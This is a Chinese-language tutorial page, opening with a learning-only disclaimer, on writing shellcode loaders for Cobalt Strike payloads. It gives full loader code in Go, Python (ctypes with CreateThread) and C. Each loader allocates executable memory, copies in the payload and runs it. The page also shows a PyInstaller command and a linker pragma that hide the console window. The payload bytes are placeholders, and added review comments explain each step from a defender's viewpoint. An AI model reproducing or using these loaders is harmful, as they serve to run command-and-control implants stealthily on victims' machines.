免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
Shellcode加载器
GoShellcode
使用cs生成shellcode
替换
去空格
def remove_whitespace_and_newlines(text):
    """Return ``text`` with every space, LF and CR character removed.

    Only those three characters are stripped; tabs and other whitespace
    are left untouched.
    """
    cleaned = text
    for ch in (" ", "\n", "\r"):
        cleaned = cleaned.replace(ch, "")
    return cleaned
# "shellcode" here is the page's placeholder text; the real input is the
# multi-line byte listing produced earlier, which this script collapses
# onto one line.
input_text = """ shellcode """
output_text = remove_whitespace_and_newlines(input_text)
print(output_text)
Go语言
// The page's Go loader. Behaviourally it is the classic three-step pattern:
// allocate an RWX region, copy bytes into it, transfer control to it.
// From a defender's view each step is observable: an RWX VirtualAlloc,
// a write into that region, and a call into non-image memory.
package main

import (
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
)

// Win32 allocation flags and page protection used by VirtualAlloc below.
const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40 // RWX protection: a common memory-scanner/EDR signal
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	// Embedded payload bytes. "----shellcode----" is the page's placeholder
	// and is not valid Go; the listing does not compile as printed.
	shellcode_buf = []byte{
		0xfc, 0x48, ----shellcode----, 0xd5,
	}
)

// checkErr prints err and exits unless it is the Windows ERROR_SUCCESS text.
// syscall.Proc.Call always returns a non-nil error, so a successful call
// still yields "The operation completed successfully." and must be ignored.
func checkErr(err error) {
	if err != nil {
		if err.Error() != "The operation completed successfully." {
			println(err.Error())
			os.Exit(1)
		}
	}
}

// main copies the payload into a fresh RWX allocation and calls it.
// With one command-line argument the payload is read from that file
// instead of shellcode_buf.
func main() {
	shellcode := shellcode_buf
	if len(os.Args) > 1 {
		// ioutil.ReadFile is deprecated since Go 1.16 (os.ReadFile); kept as on the page.
		shellcodeFileData, err := ioutil.ReadFile(os.Args[1])
		checkErr(err)
		shellcode = shellcodeFileData
	}
	// Reserve and commit one RWX region sized to the payload.
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
	}
	// Copy the payload bytes into the executable region.
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	checkErr(err)
	// Not a real system call: on Windows syscall.Syscall invokes the function
	// at the given address, so execution moves into the copied bytes.
	syscall.Syscall(addr, 0, 0, 0, 0)
}
测试上线
PythonShellcode
#!/usr/bin/pythonimport ctypesshellcode = bytearray("\xfc\xe8")ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
进行编译
# -F: bundle everything into a single executable; -w: windowed mode, no console window.
python pyinstaller.py -F -w pyshellcode.py
**C/C++** Shellcode
/* Payload bytes in a writable global; "shellcode" is the page's placeholder. */
unsigned char buf[] = "shellcode";
/* Link as a Windows-subsystem binary with the console entry point so no console
   window appears. NOTE(review): the inner quotes are printed unescaped here,
   which looks like an extraction artifact rather than the author's source. */
#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //Windows console program without the black console window
main(){
    /* Cast the data array to a function pointer and call it: data run as code.
       NOTE(review): whether this executes depends on the data section being
       executable (DEP/NX); the build settings are not shown on the page. */
    ( (void(*)(void))&buf)();
}